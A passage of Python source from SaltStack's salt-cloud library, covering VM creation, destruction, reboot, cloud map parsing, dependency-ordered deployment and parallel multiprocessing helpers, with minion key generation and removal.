self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{0}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys for which their minion
# configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we can't also get the append_domain setting.
# And if we reached this point, we have several minion keys
# who's name starts with the machine name we're deleting.
# We need to ask one by one!?
print(
"There are several minion keys who's name starts "
"with '{0}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {0}: {1}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{0}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{0}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{0}'".format(filename))
break
print("Did not delete '{0}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {0}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in six.iteritems(pmap):
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in six.iteritems(acts):
fun = "{0}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{0}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{0}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
client = salt.client.get_local_client(mopts=mopts_)
ret = client.cmd(
vm_["name"],
"saltutil.sync_{0}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
six.u(
"Synchronized the following dynamic modules: " " {0}"
).format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
client = salt.client.get_local_client(mopts=self.opts)
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{0}.{1}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {0} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except IOError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in six.iteritems(mapped_providers):
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{0} already exists under {1}:{2}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {0}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in six.iteritems(self.map_providers_parallel()):
if not names:
break
for driver, vms in six.iteritems(drivers):
if not names:
break
valid_function = True
fun = "{0}.{1}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in six.iteritems(vms):
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in six.iteritems(invalid_functions):
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
# Don't return missing VM information for invalid functions until after we've had a
# Chance to return successful actions. If a function is valid for one driver, but
# Not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
# If we reach this point, the Not Actioned and Not Found lists will be the same,
# But we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{0}'. Please specify "
"one of: {1}".format(
prov,
", ".join(
["{0}:{1}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{0}.{1}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{0}' cloud provider alias, for the '{1}' driver, does "
"not define the function '{2}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in six.iteritems(self.opts["providers"].copy()):
for driver in drivers.copy():
fun = "{0}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in six.iteritems(rendered_map):
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{0}' profile was found. "
"Skipped VMS: {1}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in six.iteritems(query_map.copy()):
for driver, vms in six.iteritems(drivers.copy()):
for vm_name, vm_details in six.iteritems(vms.copy()):
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in six.iteritems(query_map):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
# Only certain actions are support in to use in this case. Those actions are the
# "Global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in six.iteritems(map_.copy()):
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, six.string_types):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in six.iteritems(mapping):
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in six.iteritems(mapped):
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, six.string_types):
# If it's a single string entry, let's make iterable because of
# the next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in six.itervalues(dmap["create"]):
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in six.iteritems(rendered_map):
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{0}', defined in the map "
"does not exist. The defined nodes, {1}, will not "
"be created.".format(
profile_name, ", ".join("'{0}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in six.iteritems(nodes):
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{0}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for vm_name, details in six.iteritems(vms):
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for name, details in six.iteritems(vms):
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in six.iteritems(dmap["create"]):
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = six.iteritems(dmap["existing"])
except KeyError:
existing_list = six.iteritems({})
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(six.iteritems(dmap["create"]), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug(
"Master creation details is not a dictionary: {0}".format(out)
)
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {0}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {0} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
if (
self.opts.get("show_deploy_args", False) is False
and "deploy_kwargs" in output
and isinstance(output[name], dict)
):
output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(
six.itervalues(dmap["create"]), lambda x: x["level"]
):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
client = salt.client.get_local_client()
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(six.itervalues(obj))["ret"] = out[next(six.iterkeys(obj))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
Make every worker ignore KeyboarInterrup's since it will be handled by the
parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{0}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use directly decorators
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
